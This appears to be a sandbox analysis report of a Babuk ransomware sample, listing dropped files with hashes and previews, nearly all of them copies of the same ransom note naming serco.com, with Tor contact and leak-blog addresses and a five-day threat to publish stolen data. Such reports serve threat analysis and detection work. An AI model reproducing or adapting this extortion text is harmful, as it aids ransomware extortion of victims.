                                                                            SSDEEP:192:9bkC+wO8/ar2QJZV5hbbTLLXl5DMzIJeI3WpnO5W2b:SC1/Pe5hb/nT93WlEb
                                                                            MD5:ACF71FE4929C43E3B2E34368C106C7AA
                                                                            SHA1:40097D2948C3BAB9F1708F72462731943666CA85
                                                                            SHA-256:FCB0814ABB64FFE0D370B6B656B6B320FCB8B904BEA0306801915A1B4F1FDD78
                                                                            SHA-512:2159609FFD66C0C93733B615EA7540BC247B7165C3FC77D1577D797F2998B4A5989987C09CB9E8A06C101A8AAEAEEF0F1B908BBE45751043860B00B3DA0F35DC
                                                                            Malicious:false
                                                                            Preview: <+......NaD.p..C..L...%.......J......i.qD..3..Bus>.!..=?j...'..b..y$}b...!....q...m.....r..!./~.H..R.....&E.........I..:.n(....(.g..bh..9....D......<_.N..Q.P...`.(..e1.Y.-'....................!.m.P.1O.....?....L.1.{.A (ey.......)I...T.&....L{.h-........o....k.]..._....\fq..h^..f....>7.c..*.m...1.(.!.F..H.>..@... C..!q.@.#.2T..._..+D.......@.0.`1....i...^.?...C..M.../nM....A.....J"...;v......~,@laO...M..%E~..b./..*..2.....h..d....+....9..m..e.%.\....1..Ye....nyl.."N%..[.'_....K..m.,..].....9.e........U.:...M..}....im._R...4...._..GV........M.h.PZ.j%:/..w<Z..U.P.?....}$..2#...cVSF{..Dk2....[.=.`.=....s...>..4K.~.7`a+0...|......GR...m.....4.&d..1B.q.......`.=...\R..I`..<..9..8....}.g..sL<.Z.G..x`..(-.|.2.....<.xC.L.'1..}U.+(Q.X.R...S<TO#.K...+.tD:..9..*.UV..#..<.ei.+F.g.S.....d.8...mj.g...6x.7.{.<..H^<...(.).....j/....s!.!.'>.k\J......+bynZ.gql.....NT..^..j,..a..B.O3..}...,...d.........._1....V<W.y<....3!.....q..sx..!....[me...C.9\..C*.B.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.6_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Framework.1.7_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.1.6_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
